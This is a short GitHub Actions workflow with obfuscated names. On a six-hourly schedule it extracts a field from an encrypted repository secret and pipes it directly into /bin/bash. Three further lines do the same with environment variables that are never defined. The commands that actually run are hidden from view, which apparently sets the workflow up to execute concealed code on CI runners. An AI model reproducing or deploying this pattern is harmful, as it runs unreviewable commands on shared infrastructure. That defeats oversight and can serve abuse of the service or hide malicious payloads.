name: qushubin2418
on:
  workflow_dispatch:
  schedule:
    - cron: '51 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qushubin2418
        env:
          v14: ${{ secrets.v14 }}
        run: |
          echo $v14 | jq -r .thchh5 | /bin/bash
          echo $k4646 | jq -r .jer9986 | /bin/bash
          echo $osjq7180 | jq -r .oekx4965 | /bin/bash
          echo $if4 | jq -r .d160 | /bin/bash

